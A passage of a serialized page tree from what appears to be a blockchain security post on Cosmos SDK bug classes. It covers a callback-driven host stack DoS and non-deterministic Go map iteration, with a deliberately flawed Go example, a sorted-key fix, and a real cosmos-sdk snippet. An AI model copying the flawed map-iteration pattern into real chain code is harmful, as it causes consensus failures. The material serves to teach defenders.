write_region",{"type":26,"tag":137,"props":79775,"children":79776},{"style":5601},[79777],{"type":32,"value":165},{"type":26,"tag":137,"props":79779,"children":79780},{"style":5590},[79781],{"type":32,"value":5694},{"type":26,"tag":137,"props":79783,"children":79784},{"style":5584},[79785],{"type":32,"value":38286},{"type":26,"tag":137,"props":79787,"children":79788},{"style":5590},[79789],{"type":32,"value":470},{"type":26,"tag":137,"props":79791,"children":79792},{"style":5682},[79793],{"type":32,"value":78575},{"type":26,"tag":137,"props":79795,"children":79796},{"style":5601},[79797],{"type":32,"value":20968},{"type":26,"tag":137,"props":79799,"children":79800},{"style":5584},[79801],{"type":32,"value":79802},"target_ptr",{"type":26,"tag":137,"props":79804,"children":79805},{"style":5601},[79806],{"type":32,"value":1108},{"type":26,"tag":137,"props":79808,"children":79809},{"style":5584},[79810],{"type":32,"value":10952},{"type":26,"tag":137,"props":79812,"children":79813},{"style":5601},[79814],{"type":32,"value":200},{"type":26,"tag":137,"props":79816,"children":79817},{"style":5590},[79818],{"type":32,"value":5737},{"type":26,"tag":137,"props":79820,"children":79821},{"style":5601},[79822],{"type":32,"value":5604},{"type":26,"tag":137,"props":79824,"children":79825},{"class":5559,"line":6191},[79826,79830,79834,79838],{"type":26,"tag":137,"props":79827,"children":79828},{"style":6009},[79829],{"type":32,"value":16924},{"type":26,"tag":137,"props":79831,"children":79832},{"style":5601},[79833],{"type":32,"value":165},{"type":26,"tag":137,"props":79835,"children":79836},{"style":5584},[79837],{"type":32,"value":79802},{"type":26,"tag":137,"props":79839,"children":79840},{"style":5601},[79841],{"type":32,"value":5742},{"type":26,"tag":137,"props":79843,"children":79844},{"class":5559,"line":6208},[79845],{"type":26,"tag":137,"props":79846,"children":79847},{"style":5601},[79848],{"type":32,"value":6507},{"type":26,"tag":35,"props":79850,"children":79851},{},[79852,79854,79860,79862,79867],{"type":32,"value":79853},"As users have complete control over ",{"type":26,"tag":130,"props":79855,"children":79857},{"className":79856},[],[79858],{"type":32,"value":79859},"allocate",{"type":32,"value":79861},", there is a possibility to call back ",{"type":26,"tag":130,"props":79863,"children":79865},{"className":79864},[],[79866],{"type":32,"value":79323},{"type":32,"value":79868}," repeatedly through other imported functions. This can result in the depletion of the host stack and ultimately lead to a DoS.",{"type":26,"tag":35,"props":79870,"children":79871},{},[79872,79874,79881],{"type":32,"value":79873},"Additional real-world examples include ",{"type":26,"tag":41,"props":79875,"children":79878},{"href":79876,"rel":79877},"https://github.com/cosmos/cosmos-sdk/issues/16676",[45],[79879],{"type":32,"value":79880},"not returning proper values for malformed txs",{"type":32,"value":470},{"type":26,"tag":92,"props":79883,"children":79885},{"id":79884},"order-was-the-dream-of-man",[79886],{"type":32,"value":79887},"Order Was the Dream of Man",{"type":26,"tag":35,"props":79889,"children":79890},{},[79891],{"type":32,"value":79892},"Different from solidity, which is a domain-specific language for smart contracts, Golang is not. Therefore, developers must be mindful of specific footguns. One notable instance is non-determinism.",{"type":26,"tag":35,"props":79894,"children":79895},{},[79896],{"type":32,"value":79897},"Consider a scenario where there is a requirement to emit an event for every entry in a map. It might be tempting to implement this as demonstrated below:",{"type":26,"tag":5512,"props":79899,"children":79901},{"code":79900,"language":78767,"meta":7,"className":78768,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n    for key, value := range objectMap {\n        ctx.EventManager.EmitEvent(\n            sdk.NewEvent(\n                \"MapContext\",\n                sdk.NewAttribute(key, value),\n            )\n        )\n    }\n}\n",[79902],{"type":26,"tag":130,"props":79903,"children":79904},{"__ignoreMap":7},[79905,79938,79945,79974,80011,80040,80061,80073,80110,80118,80125,80132],{"type":26,"tag":137,"props":79906,"children":79907},{"class":5559,"line":5560},[79908,79912,79917,79921,79925,79929,79933],{"type":26,"tag":137,"props":79909,"children":79910},{"style":5573},[79911],{"type":32,"value":35352},{"type":26,"tag":137,"props":79913,"children":79914},{"style":6009},[79915],{"type":32,"value":79916}," ObjectMap",{"type":26,"tag":137,"props":79918,"children":79919},{"style":5573},[79920],{"type":32,"value":52271},{"type":26,"tag":137,"props":79922,"children":79923},{"style":5601},[79924],{"type":32,"value":3016},{"type":26,"tag":137,"props":79926,"children":79927},{"style":6009},[79928],{"type":32,"value":32260},{"type":26,"tag":137,"props":79930,"children":79931},{"style":5601},[79932],{"type":32,"value":3079},{"type":26,"tag":137,"props":79934,"children":79935},{"style":6009},[79936],{"type":32,"value":79937},"string\n",{"type":26,"tag":137,"props":79939,"children":79940},{"class":5559,"line":5412},[79941],{"type":26,"tag":137,"props":79942,"children":79943},{"emptyLinePlaceholder":18},[79944],{"type":32,"value":6276},{"type":26,"tag":137,"props":79946,"children":79947},{"class":5559,"line":5417},[79948,79952,79957,79961,79966,79970],{"type":26,"tag":137,"props":79949,"children":79950},{"style":5573},[79951],{"type":32,"value":78903},{"type":26,"tag":137,"props":79953,"children":79954},{"style":5682},[79955],{"type":32,"value":79956}," EmitEntries",{"type":26,"tag":137,"props":79958,"children":79959},{"style":5601},[79960],{"type":32,"value":165},{"type":26,"tag":137,"props":79962,"children":79963},{"style":5584},[79964],{"type":32,"value":79965},"objectMap",{"type":26,"tag":137,"props":79967,"children":79968},{"style":6009},[79969],{"type":32,"value":79916},{"type":26,"tag":137,"props":79971,"children":79972},{"style":5601},[79973],{"type":32,"value":17395},{"type":26,"tag":137,"props":79975,"children":79976},{"class":5559,"line":5642},[79977,79981,79985,79989,79993,79997,80002,80007],{"type":26,"tag":137,"props":79978,"children":79979},{"style":5610},[79980],{"type":32,"value":5613},{"type":26,"tag":137,"props":79982,"children":79983},{"style":5584},[79984],{"type":32,"value":8517},{"type":26,"tag":137,"props":79986,"children":79987},{"style":5601},[79988],{"type":32,"value":1108},{"type":26,"tag":137,"props":79990,"children":79991},{"style":5584},[79992],{"type":32,"value":41748},{"type":26,"tag":137,"props":79994,"children":79995},{"style":5590},[79996],{"type":32,"value":79019},{"type":26,"tag":137,"props":79998,"children":79999},{"style":5610},[80000],{"type":32,"value":80001}," range",{"type":26,"tag":137,"props":80003,"children":80004},{"style":5584},[80005],{"type":32,"value":80006}," objectMap",{"type":26,"tag":137,"props":80008,"children":80009},{"style":5601},[80010],{"type":32,"value":5875},{"type":26,"tag":137,"props":80012,"children":80013},{"class":5559,"line":5745},[80014,80018,80022,80027,80031,80036],{"type":26,"tag":137,"props":80015,"children":80016},{"style":5584},[80017],{"type":32,"value":28778},{"type":26,"tag":137,"props":80019,"children":80020},{"style":5601},[80021],{"type":32,"value":470},{"type":26,"tag":137,"props":80023,"children":80024},{"style":5584},[80025],{"type":32,"value":80026},"EventManager",{"type":26,"tag":137,"props":80028,"children":80029},{"style":5601},[80030],{"type":32,"value":470},{"type":26,"tag":137,"props":80032,"children":80033},{"style":5682},[80034],{"type":32,"value":80035},"EmitEvent",{"type":26,"tag":137,"props":80037,"children":80038},{"style":5601},[80039],{"type":32,"value":6054},{"type":26,"tag":137,"props":80041,"children":80042},{"class":5559,"line":5850},[80043,80048,80052,80057],{"type":26,"tag":137,"props":80044,"children":80045},{"style":5584},[80046],{"type":32,"value":80047},"            sdk",{"type":26,"tag":137,"props":80049,"children":80050},{"style":5601},[80051],{"type":32,"value":470},{"type":26,"tag":137,"props":80053,"children":80054},{"style":5682},[80055],{"type":32,"value":80056},"NewEvent",{"type":26,"tag":137,"props":80058,"children":80059},{"style":5601},[80060],{"type":32,"value":6054},{"type":26,"tag":137,"props":80062,"children":80063},{"class":5559,"line":5878},[80064,80069],{"type":26,"tag":137,"props":80065,"children":80066},{"style":6837},[80067],{"type":32,"value":80068},"                \"MapContext\"",{"type":26,"tag":137,"props":80070,"children":80071},{"style":5601},[80072],{"type":32,"value":6099},{"type":26,"tag":137,"props":80074,"children":80075},{"class":5559,"line":5891},[80076,80081,80085,80090,80094,80098,80102,80106],{"type":26,"tag":137,"props":80077,"children":80078},{"style":5584},[80079],{"type":32,"value":80080},"                sdk",{"type":26,"tag":137,"props":80082,"children":80083},{"style":5601},[80084],{"type":32,"value":470},{"type":26,"tag":137,"props":80086,"children":80087},{"style":5682},[80088],{"type":32,"value":80089},"NewAttribute",{"type":26,"tag":137,"props":80091,"children":80092},{"style":5601},[80093],{"type":32,"value":165},{"type":26,"tag":137,"props":80095,"children":80096},{"style":5584},[80097],{"type":32,"value":74757},{"type":26,"tag":137,"props":80099,"children":80100},{"style":5601},[80101],{"type":32,"value":1108},{"type":26,"tag":137,"props":80103,"children":80104},{"style":5584},[80105],{"type":32,"value":41748},{"type":26,"tag":137,"props":80107,"children":80108},{"style":5601},[80109],{"type":32,"value":9320},{"type":26,"tag":137,"props":80111,"children":80112},{"class":5559,"line":5909},[80113],{"type":26,"tag":137,"props":80114,"children":80115},{"style":5601},[80116],{"type":32,"value":80117},"            )\n",{"type":26,"tag":137,"props":80119,"children":80120},{"class":5559,"line":5930},[80121],{"type":26,"tag":137,"props":80122,"children":80123},{"style":5601},[80124],{"type":32,"value":70922},{"type":26,"tag":137,"props":80126,"children":80127},{"class":5559,"line":5939},[80128],{"type":26,"tag":137,"props":80129,"children":80130},{"style":5601},[80131],{"type":32,"value":5945},{"type":26,"tag":137,"props":80133,"children":80134},{"class":5559,"line":6191},[80135],{"type":26,"tag":137,"props":80136,"children":80137},{"style":5601},[80138],{"type":32,"value":6507},{"type":26,"tag":35,"props":80140,"children":80141},{},[80142],{"type":32,"value":80143},"It's important to note that Golang map iterators are unordered by design. As stated below in the Golang documentation citation, running the same code with different validators may result in varying event orders, potentially causing consensus problems.",{"type":26,"tag":5503,"props":80145,"children":80146},{},[80147],{"type":26,"tag":35,"props":80148,"children":80149},{},[80150],{"type":32,"value":80151},"When iterating over a map with a range loop, the iteration order is not specified and is not guaranteed to be the same from one iteration to the next.",{"type":26,"tag":35,"props":80153,"children":80154},{},[80155,80157,80162],{"type":32,"value":80156},"To correctly implement iteration orders, developers must explicitly sort the keys of the ",{"type":26,"tag":130,"props":80158,"children":80160},{"className":80159},[],[80161],{"type":32,"value":69703},{"type":32,"value":80163}," and then fetch the values using the sorted key array before emitting them.",{"type":26,"tag":5512,"props":80165,"children":80167},{"code":80166,"language":78767,"meta":7,"className":78768,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n    var keys []string\n    for key := range objectMap {\n        keys = append(keys, key)\n    }\n    sort.Strings(keys)\n\n    for _, key := range keys {\n        ctx.EventManager.EmitEvent(\n            sdk.NewEvent(\n                \"MapContext\",\n                sdk.NewAttribute(key, objectMap[key]),\n            )\n        )\n    }\n}\n",[80168],{"type":26,"tag":130,"props":80169,"children":80170},{"__ignoreMap":7},[80171,80202,80209,80236,80256,80283,80319,80326,80355,80362,80397,80424,80443,80454,80498,80505,80512,80519],{"type":26,"tag":137,"props":80172,"children":80173},{"class":5559,"line":5560},[80174,80178,80182,80186,80190,80194,80198],{"type":26,"tag":137,"props":80175,"children":80176},{"style":5573},[80177],{"type":32,"value":35352},{"type":26,"tag":137,"props":80179,"children":80180},{"style":6009},[80181],{"type":32,"value":79916},{"type":26,"tag":137,"props":80183,"children":80184},{"style":5573},[80185],{"type":32,"value":52271},{"type":26,"tag":137,"props":80187,"children":80188},{"style":5601},[80189],{"type":32,"value":3016},{"type":26,"tag":137,"props":80191,"children":80192},{"style":6009},[80193],{"type":32,"value":32260},{"type":26,"tag":137,"props":80195,"children":80196},{"style":5601},[80197],{"type":32,"value":3079},{"type":26,"tag":137,"props":80199,"children":80200},{"style":6009},[80201],{"type":32,"value":79937},{"type":26,"tag":137,"props":80203,"children":80204},{"class":5559,"line":5412},[80205],{"type":26,"tag":137,"props":80206,"children":80207},{"emptyLinePlaceholder":18},[80208],{"type":32,"value":6276},{"type":26,"tag":137,"props":80210,"children":80211},{"class":5559,"line":5417},[80212,80216,80220,80224,80228,80232],{"type":26,"tag":137,"props":80213,"children":80214},{"style":5573},[80215],{"type":32,"value":78903},{"type":26,"tag":137,"props":80217,"children":80218},{"style":5682},[80219],{"type":32,"value":79956},{"type":26,"tag":137,"props":80221,"children":80222},{"style":5601},[80223],{"type":32,"value":165},{"type":26,"tag":137,"props":80225,"children":80226},{"style":5584},[80227],{"type":32,"value":79965},{"type":26,"tag":137,"props":80229,"children":80230},{"style":6009},[80231],{"type":32,"value":79916},{"type":26,"tag":137,"props":80233,"children":80234},{"style":5601},[80235],{"type":32,"value":17395},{"type":26,"tag":137,"props":80237,"children":80238},{"class":5559,"line":5642},[80239,80244,80248,80252],{"type":26,"tag":137,"props":80240,"children":80241},{"style":5573},[80242],{"type":32,"value":80243},"    var",{"type":26,"tag":137,"props":80245,"children":80246},{"style":5584},[80247],{"type":32,"value":23973},{"type":26,"tag":137,"props":80249,"children":80250},{"style":5601},[80251],{"type":32,"value":78830},{"type":26,"tag":137,"props":80253,"children":80254},{"style":6009},[80255],{"type":32,"value":79937},{"type":26,"tag":137,"props":80257,"children":80258},{"class":5559,"line":5745},[80259,80263,80267,80271,80275,80279],{"type":26,"tag":137,"props":80260,"children":80261},{"style":5610},[80262],{"type":32,"value":5613},{"type":26,"tag":137,"props":80264,"children":80265},{"style":5584},[80266],{"type":32,"value":8517},{"type":26,"tag":137,"props":80268,"children":80269},{"style":5590},[80270],{"type":32,"value":79019},{"type":26,"tag":137,"props":80272,"children":80273},{"style":5610},[80274],{"type":32,"value":80001},{"type":26,"tag":137,"props":80276,"children":80277},{"style":5584},[80278],{"type":32,"value":80006},{"type":26,"tag":137,"props":80280,"children":80281},{"style":5601},[80282],{"type":32,"value":5875},{"type":26,"tag":137,"props":80284,"children":80285},{"class":5559,"line":5850},[80286,80290,80294,80299,80303,80307,80311,80315],{"type":26,"tag":137,"props":80287,"children":80288},{"style":5584},[80289],{"type":32,"value":27923},{"type":26,"tag":137,"props":80291,"children":80292},{"style":5590},[80293],{"type":32,"value":5593},{"type":26,"tag":137,"props":80295,"children":80296},{"style":5682},[80297],{"type":32,"value":80298}," append",{"type":26,"tag":137,"props":80300,"children":80301},{"style":5601},[80302],{"type":32,"value":165},{"type":26,"tag":137,"props":80304,"children":80305},{"style":5584},[80306],{"type":32,"value":23576},{"type":26,"tag":137,"props":80308,"children":80309},{"style":5601},[80310],{"type":32,"value":1108},{"type":26,"tag":137,"props":80312,"children":80313},{"style":5584},[80314],{"type":32,"value":74757},{"type":26,"tag":137,"props":80316,"children":80317},{"style":5601},[80318],{"type":32,"value":5742},{"type":26,"tag":137,"props":80320,"children":80321},{"class":5559,"line":5878},[80322],{"type":26,"tag":137,"props":80323,"children":80324},{"style":5601},[80325],{"type":32,"value":5945},{"type":26,"tag":137,"props":80327,"children":80328},{"class":5559,"line":5891},[80329,80334,80338,80343,80347,80351],{"type":26,"tag":137,"props":80330,"children":80331},{"style":5584},[80332],{"type":32,"value":80333},"    sort",{"type":26,"tag":137,"props":80335,"children":80336},{"style":5601},[80337],{"type":32,"value":470},{"type":26,"tag":137,"props":80339,"children":80340},{"style":5682},[80341],{"type":32,"value":80342},"Strings",{"type":26,"tag":137,"props":80344,"children":80345},{"style":5601},[80346],{"type":32,"value":165},{"type":26,"tag":137,"props":80348,"children":80349},{"style":5584},[80350],{"type":32,"value":23576},{"type":26,"tag":137,"props":80352,"children":80353},{"style":5601},[80354],{"type":32,"value":5742},{"type":26,"tag":137,"props":80356,"children":80357},{"class":5559,"line":5909},[80358],{"type":26,"tag":137,"props":80359,"children":80360},{"emptyLinePlaceholder":18},[80361],{"type":32,"value":6276},{"type":26,"tag":137,"props":80363,"children":80364},{"class":5559,"line":5930},[80365,80369,80373,80377,80381,80385,80389,80393],{"type":26,"tag":137,"props":80366,"children":80367},{"style":5610},[80368],{"type":32,"value":5613},{"type":26,"tag":137,"props":80370,"children":80371},{"style":5584},[80372],{"type":32,"value":5618},{"type":26,"tag":137,"props":80374,"children":80375},{"style":5601},[80376],{"type":32,"value":1108},{"type":26,"tag":137,"props":80378,"children":80379},{"style":5584},[80380],{"type":32,"value":74757},{"type":26,"tag":137,"props":80382,"children":80383},{"style":5590},[80384],{"type":32,"value":79019},{"type":26,"tag":137,"props":80386,"children":80387},{"style":5610},[80388],{"type":32,"value":80001},{"type":26,"tag":137,"props":80390,"children":80391},{"style":5584},[80392],{"type":32,"value":23973},{"type":26,"tag":137,"props":80394,"children":80395},{"style":5601},[80396],{"type":32,"value":5875},{"type":26,"tag":137,"props":80398,"children":80399},{"class":5559,"line":5939},[80400,80404,80408,80412,80416,80420],{"type":26,"tag":137,"props":80401,"children":80402},{"style":5584},[80403],{"type":32,"value":28778},{"type":26,"tag":137,"props":80405,"children":80406},{"style":5601},[80407],{"type":32,"value":470},{"type":26,"tag":137,"props":80409,"children":80410},{"style":5584},[80411],{"type":32,"value":80026},{"type":26,"tag":137,"props":80413,"children":80414},{"style":5601},[80415],{"type":32,"value":470},{"type":26,"tag":137,"props":80417,"children":80418},{"style":5682},[80419],{"type":32,"value":80035},{"type":26,"tag":137,"props":80421,"children":80422},{"style":5601},[80423],{"type":32,"value":6054},{"type":26,"tag":137,"props":80425,"children":80426},{"class":5559,"line":6191},[80427,80431,80435,80439],{"type":26,"tag":137,"props":80428,"children":80429},{"style":5584},[80430],{"type":32,"value":80047},{"type":26,"tag":137,"props":80432,"children":80433},{"style":5601},[80434],{"type":32,"value":470},{"type":26,"tag":137,"props":80436,"children":80437},{"style":5682},[80438],{"type":32,"value":80056},{"type":26,"tag":137,"props":80440,"children":80441},{"style":5601},[80442],{"type":32,"value":6054},{"type":26,"tag":137,"props":80444,"children":80445},{"class":5559,"line":6208},[80446,80450],{"type":26,"tag":137,"props":80447,"children":80448},{"style":6837},[80449],{"type":32,"value":80068},{"type":26,"tag":137,"props":80451,"children":80452},{"style":5601},[80453],{"type":32,"value":6099},{"type":26,"tag":137,"props":80455,"children":80456},{"class":5559,"line":6225},[80457,80461,80465,80469,80473,80477,80481,80485,80489,80493],{"type":26,"tag":137,"props":80458,"children":80459},{"style":5584},[80460],{"type":32,"value":80080},{"type":26,"tag":137,"props":80462,"children":80463},{"style":5601},[80464],{"type":32,"value":470},{"type":26,"tag":137,"props":80466,"children":80467},{"style":5682},[80468],{"type":32,"value":80089},{"type":26,"tag":137,"props":80470,"children":80471},{"style":5601},[80472],{"type":32,"value":165},{"type":26,"tag":137,"props":80474,"children":80475},{"style":5584},[80476],{"type":32,"value":74757},{"type":26,"tag":137,"props":80478,"children":80479},{"style":5601},[80480],{"type":32,"value":1108},{"type":26,"tag":137,"props":80482,"children":80483},{"style":5584},[80484],{"type":32,"value":79965},{"type":26,"tag":137,"props":80486,"children":80487},{"style":5601},[80488],{"type":32,"value":3016},{"type":26,"tag":137,"props":80490,"children":80491},{"style":5584},[80492],{"type":32,"value":74757},{"type":26,"tag":137,"props":80494,"children":80495},{"style":5601},[80496],{"type":32,"value":80497},"]),\n",{"type":26,"tag":137,"props":80499,"children":80500},{"class":5559,"line":6238},[80501],{"type":26,"tag":137,"props":80502,"children":80503},{"style":5601},[80504],{"type":32,"value":80117},{"type":26,"tag":137,"props":80506,"children":80507},{"class":5559,"line":6247},[80508],{"type":26,"tag":137,"props":80509,"children":80510},{"style":5601},[80511],{"type":32,"value":70922},{"type":26,"tag":137,"props":80513,"children":80514},{"class":5559,"line":6270},[80515],{"type":26,"tag":137,"props":80516,"children":80517},{"style":5601},[80518],{"type":32,"value":5945},{"type":26,"tag":137,"props":80520,"children":80521},{"class":5559,"line":6279},[80522],{"type":26,"tag":137,"props":80523,"children":80524},{"style":5601},[80525],{"type":32,"value":6507},{"type":26,"tag":35,"props":80527,"children":80528},{},[80529],{"type":32,"value":80530},"The combination of hidden code within external Golang dependencies makes it difficult to avoid language-wise quirks fully. It is crucial to remain vigilant and avoid underestimating the gravity of this lingering bug class.",{"type":26,"tag":118,"props":80532,"children":80534},{"id":80533},"real-world-examples-1",[80535],{"type":32,"value":79292},{"type":26,"tag":35,"props":80537,"children":80538},{},[80539,80541,80546,80548,80554,80556,80562,80564,80570],{"type":32,"value":80540},"Real-world examples of ",{"type":26,"tag":130,"props":80542,"children":80544},{"className":80543},[],[80545],{"type":32,"value":69703},{"type":32,"value":80547}," causing determinism problems can be found ",{"type":26,"tag":41,"props":80549,"children":80552},{"href":80550,"rel":80551},"https://github.com/cosmos/cosmos-sdk/pull/12487",[45],[80553],{"type":32,"value":3580},{"type":32,"value":80555},", specifically, where the result of ",{"type":26,"tag":130,"props":80557,"children":80559},{"className":80558},[],[80560],{"type":32,"value":80561},"buildCommitInfo",{"type":32,"value":80563}," is inconsistent due to iteration over the ",{"type":26,"tag":130,"props":80565,"children":80567},{"className":80566},[],[80568],{"type":32,"value":80569},"rs.stores",{"type":32,"value":80571}," map.",{"type":26,"tag":35,"props":80573,"children":80574},{},[80575],{"type":26,"tag":41,"props":80576,"children":80579},{"href":80577,"rel":80578},"https://github.com/cosmos/cosmos-sdk/blob/55054282d2df794d9a5fe2599ea25473379ebc3d/store/rootmulti/store.go#L909",[45],[80580],{"type":32,"value":79342},{"type":26,"tag":5512,"props":80582,"children":80584},{"code":80583,"language":78767,"meta":7,"className":78768,"style":7},"func (rs *Store) buildCommitInfo(\n    version int64\n) *types.CommitInfo {\n    storeInfos := []types.StoreInfo{}\n    for key, store := range rs.stores {\n        if store.GetStoreType() == types.StoreTypeTransient {\n            continue\n        }\n        storeInfos = append(storeInfos, types.StoreInfo{\n            Name:     key.Name(),\n            CommitId: store.LastCommitID(),\n        })\n    }\n    return &types.CommitInfo{\n        Version:    version,\n        StoreInfos: storeInfos,\n    }\n}\n",[80585],{"type":26,"tag":130,"props":80586,"children":80587},{"__ignoreMap":7},[80588,80625,80638,80666,80700,80745,80791,80799,80806,80851,80881,80910,80917,80924,80951,80973,80993,81000],{"type":26,"tag":137,"props":80589,"children":80590},{"class":5559,"line":5560},[80591,80595,80599,80604,80608,80613,80617,80621],{"type":26,"tag":137,"props":80592,"children":80593},{"style":5573},[80594],{"type":32,"value":78903},{"type":26,"tag":137,"props":80596,"children":80597},{"style":5601},[80598],{"type":32,"value":4625},{"type":26,"tag":137,"props":80600,"children":80601},{"style":5584},[80602],{"type":32,"value":80603},"rs ",{"type":26,"tag":137,"props":80605,"children":80606},{"style":5590},[80607],{"type":32,"value":7152},{"type":26,"tag":137,"props":80609,"children":80610},{"style":6009},[80611],{"type":32,"value":80612},"Store",{"type":26,"tag":137,"props":80614,"children":80615},{"style":5601},[80616],{"type":32,"value":5671},{"type":26,"tag":137,"props":80618,"children":80619},{"style":5682},[80620],{"type":32,"value":80561},{"type":26,"tag":137,"props":80622,"children":80623},{"style":5601},[80624],{"type":32,"value":6054},{"type":26,"tag":137,"props":80626,"children":80627},{"class":5559,"line":5412},[80628,80633],{"type":26,"tag":137,"props":80629,"children":80630},{"style":5584},[80631],{"type":32,"value":80632},"    version",{"type":26,"tag":137,"props":80634,"children":80635},{"style":6009},[80636],{"type":32,"value":80637}," int64\n",{"type":26,"tag":137,"props":80639,"children":80640},{"class":5559,"line":5417},[80641,80645,80649,80653,80657,80662],{"type":26,"tag":137,"props":80642,"children":80643},{"style":5601},[80644],{"type":32,"value":5671},{"type":26,"tag":137,"props":80646,"children":80647},{"style":5590},[80648],{"type":32,"value":7152},{"type":26,"tag":137,"props":80650,"children":80651},{"style":6009},[80652],{"type":32,"value":8343},{"type":26,"tag":137,"props":80654,"children":80655},{"style":5601},[80656],{"type":32,"value":470},{"type":26,"tag":137,"props":80658,"children":80659},{"style":6009},[80660],{"type":32,"value":80661},"CommitInfo",{"type":26,"tag":137,"props":80663,"children":80664},{"style":5601},[80665],{"type":32,"value":5875},{"type":26,"tag":137,"props":80667,"children":80668},{"class":5559,"line":5642},[80669,80674,80678,80682,80686,80690,80695],{"type":26,"tag":137,"props":80670,"children":80671},{"style":5584},[80672],{"type":32,"value":80673},"    storeInfos",{"type":26,"tag":137,"props":80675,"children":80676},{"style":5590},[80677],{"type":32,"value":79019},{"type":26,"tag":137,"props":80679,"children":80680},{"style":5601},[80681],{"type":32,"value":78830},{"type":26,"tag":137,"props":80683,"children":80684},{"style":6009},[80685],{"type":32,"value":8343},{"type":26,"tag":137,"props":80687,"children":80688},{"style":5601},[80689],{"type":32,"value":470},{"type":26,"tag":137,"props":80691,"children":80692},{"style":6009},[80693],{"type":32,"value":80694},"StoreInfo",{"type":26,"tag":137,"props":80696,"children":80697},{"style":5601},[80698],{"type":32,"value":80699},"{}\n",{"type":26,"tag":137,"props":80701,"children":80702},{"class":5559,"line":5745},[80703,80707,80711,80715,80719,80723,80727,80732,80736,80741],{"type":26,"tag":137,"props":80704,"children":80705},{"style":5610},[80706],{"type":32,"value":5613},{"type":26,"tag":137,"props":80708,"children":80709},{"style":5584},[80710],{"type":32,"value":8517},{"type":26,"tag":137,"props":80712,"children":80713},{"style":5601},[80714],{"type":32,"value":1108},{"type":26,"tag":137,"props":80716,"children":80717},{"style":5584},[80718],{"type":32,"value":8526},{"type":26,"tag":137,"props":80720,"children":80721},{"style":5590},[80722],{"type":32,"value":79019},{"type":26,"tag":137,"props":80724,"children":80725},{"style":5610},[80726],{"type":32,"value":80001},{"type":26,"tag":137,"props":80728,"children":80729},{"style":5584},[80730],{"type":32,"value":80731}," rs",{"type":26,"tag":137,"props":80733,"children":80734},{"style":5601},[80735],{"type":32,"value":470},{"type":26,"tag":137,"props":80737,"children":80738},{"style":5584},[80739],{"type":32,"value":80740},"stores",{"type":26,"tag":137,"props":80742,"children":80743},{"style":5601},[80744],{"type":32,"value":5875},{"type":26,"tag":137,"props":80746,"children":80747},{"class":5559,"line":5850},[80748,80752,80756,80760,80765,80769,80773,80778,80782,80787],{"type":26,"tag":137,"props":80749,"children":80750},{"style":5610},[80751],{"type":32,"value":5856},{"type":26,"tag":137,"props":80753,"children":80754},{"style":5584},[80755],{"type":32,"value":8416},{"type":26,"tag":137,"props":80757,"children":80758},{"style":5601},[80759],{"type":32,"value":470},{"type":26,"tag":137,"props":80761,"children":80762},{"style":5682},[80763],{"type":32,"value":80764},"GetStoreType",{"type":26,"tag":137,"props":80766,"children":80767},{"style":5601},[80768],{"type":32,"value":16634},{"type":26,"tag":137,"props":80770,"children":80771},{"style":5590},[80772],{"type":32,"value":11161},{"type":26,"tag":137,"props":80774,"children":80775},{"style":5584},[80776],{"type":32,"value":80777}," types",{"type":26,"tag":137,"props":80779,"children":80780},{"style":5601},[80781],{"type":32,"value":470},{"type":26,"tag":137,"props":80783,"children":80784},{"style":5584},[80785],{"type":32,"value":80786},"StoreTypeTransient",{"type":26,"tag":137,"props":80788,"children":80789},{"style":5601},[80790],{"type":32,"value":5875},{"type":26,"tag":137,"props":80792,"children":80793},{"class":5559,"line":5878},[80794],{"type":26,"tag":137,"props":80795,"children":80796},{"style":5610},[80797],{"type":32,"value":80798},"            continue\n",{"type":26,"tag":137,"props":80800,"children":80801},{"class":5559,"line":5891},[80802],{"type":26,"tag":137,"props":80803,"children":80804},{"style":5601},[80805],{"type":32,"value":5936},{"type":26,"tag":137,"props":80807,"children":80808},{"class":5559,"line":5909},[80809,80814,80818,80822,80826,80831,80835,80839,80843,80847],{"type":26,"tag":137,"props":80810,"children":80811},{"style":5584},[80812],{"type":32,"value":80813},"        storeInfos",{"type":26,"tag":137,"props":80815,"children":80816},{"style":5590},[80817],{"type":32,"value":5593},{"type":26,"tag":137,"props":80819,"children":80820},{"style":5682},[80821],{"type":32,"value":80298},{"type":26,"tag":137,"props":80823,"children":80824},{"style":5601},[80825],{"type":32,"value":165},{"type":26,"tag":137,"props":80827,"children":80828},{"style":5584},[80829],{"type":32,"value":80830},"storeInfos",{"type":26,"tag":137,"props":80832,"children":80833},{"style":5601},[80834],{"type":32,"value":1108},{"type":26,"tag":137,"props":80836,"children":80837},{"style":6009},[80838],{"type":32,"value":8343},{"type":26,"tag":137,"props":80840,"children":80841},{"style":5601},[80842],{"type":32,"value":470},{"type":26,"tag":137,"props":80844,"children":80845},{"style":6009},[80846],{"type":32,"value":80694},{"type":26,"tag":137,"props":80848,"children":80849},{"style":5601},[80850],{"type":32,"value":13471},{"type":26,"tag":137,"props":80852,"children":80853},{"class":5559,"line":5930},[80854,80859,80864,80868,80872,80877],{"type":26,"tag":137,"props":80855,"children":80856},{"style":5584},[80857],{"type":32,"value":80858},"            Name",{"type":26,"tag":137,"props":80860,"children":80861},{"style":5601},[80862],{"type":32,"value":80863},":     ",{"type":26,"tag":137,"props":80865,"children":80866},{"style":5584},[80867],{"type":32,"value":74757},{"type":26,"tag":137,"props":80869,"children":80870},{"style":5601},[80871],{"type":32,"value":470},{"type":26,"tag":137,"props":80873,"children":80874},{"style":5682},[80875],{"type":32,"value":80876},"Name",{"type":26,"tag":137,"props":80878,"children":80879},{"style":5601},[80880],{"type":32,"value":6082},{"type":26,"tag":137,"props":80882,"children":80883},{"class":5559,"line":5939},[80884,80889,80893,80897,80901,80906],{"type":26,"tag":137,"props":80885,"children":80886},{"style":5584},[80887],{"type":32,"value":80888},"            